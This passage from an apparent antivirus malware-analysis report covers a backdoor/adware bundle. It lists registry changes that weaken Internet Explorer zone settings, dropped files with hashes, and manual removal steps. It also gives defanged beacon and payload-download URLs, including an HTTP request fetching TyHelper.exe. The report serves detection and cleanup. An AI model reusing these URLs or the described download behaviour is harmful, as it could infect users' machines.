[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Version" = "22022115"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 22 EC 7F EB E8 66 A0 18 30 12 CF 8D A6 41 3F"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"6185d035" = "VP/h/CP/V//l////"
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"State" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"1520c6f1" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"dbaf3ce3" = "/P////%%"
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.1" = "mPgPJqqomjlhabcdef"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svn" = "Supporter"
"svi" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"587b5709" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svx" = ""
"svt" = "1421537600"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"6185d035" = "VP/h/CP/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Install_Dir" = "%Program Files%\Supporter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoRepair" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"dlpath" = "c:\progra~1\suppor~1\suppor~1.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"
"svpath" = "c:\Program Files\Supporter\Supporter.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"0e93c3f3" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"40030ae4" = "%Program Files%\Supporter\Supporter.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"7f69fa1f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
8af622327e2c6ef36dd2b147ec7d25b7 | c:\Program Files\Follow\Follow.exe |
d32d158eff9112caba8eea4ba9ca5975 | c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.dll |
8af622327e2c6ef36dd2b147ec7d25b7 | c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.exe |
d32d158eff9112caba8eea4ba9ca5975 | c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll |
8af622327e2c6ef36dd2b147ec7d25b7 | c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mscorsvw.exe:172
regsvr32.exe:388
regsvr32.exe:1776
rundll32.exe:1848
rundll32.exe:1324
%original file name%.exe:2008
%original file name%.exe:1664
%original file name%.exe:1252
%original file name%.exe:596
TyHelpTFUO.exe:1516
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)
%Program Files%\Follow\Follow.dat (6 bytes)
%Program Files%\Follow\Follow.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)
%Program Files%\Supporter\Supporter.dll (262021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 356105 | 356352 | 4.87791 | 107f80c7b2497b87f17b6053858abc7c |
.rdata | 360448 | 20226 | 20480 | 3.32227 | 0425f360dbef9ea530c9d62bd96a0497 |
.data | 380928 | 863812 | 854016 | 4.18045 | be5e4e00140775f479c4438504b275b9 |
.rsrc | 1245184 | 112471 | 114688 | 3.73244 | 520e3ad746a2e820383856d794eb62d1 |
.reloc | 1359872 | 9890 | 10240 | 3.164 | ae41b41c919a7e9d9def9fe8386787e2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://flagmisterlibcontent.net/ | |
hxxp://flagmisterlibcontent.net/?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
hxxp://flagmisterlibcontent.net/?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
hxxp://masterial.net/?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 | 104.28.23.111 |
hxxp://flagmisterlibcontent.net/?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
hxxp://bestories.org/?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 | 104.28.11.38 |
hxxp://flagmisterlibcontent.net/?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
hxxp://bestories.org/?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 | 104.28.11.38 |
hxxp://flagmisterlibcontent.net/?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
hxxp://settlemental.net/TyHelper.exe | 54.68.119.243 |
hxxp://c1.winnerican.info/?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
hxxp://c1.winnerican.info/?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
hxxp://r1.flagmisterlibcontent.net/ | 54.69.32.99 |
hxxp://c1.winnerican.info/?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
hxxp://c1.winnerican.info/?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
hxxp://c1.winnerican.info/?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
HEAD /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 18 Jan 2015 04:44:26 GMT
Content-Type: application/octet-stream
Content-Length: 6475776
Last-Modified: Fri, 09 Jan 2015 04:20:07 GMT
Connection: close
ETag: "54af56f7-62d000"
Accept-Ranges: bytes
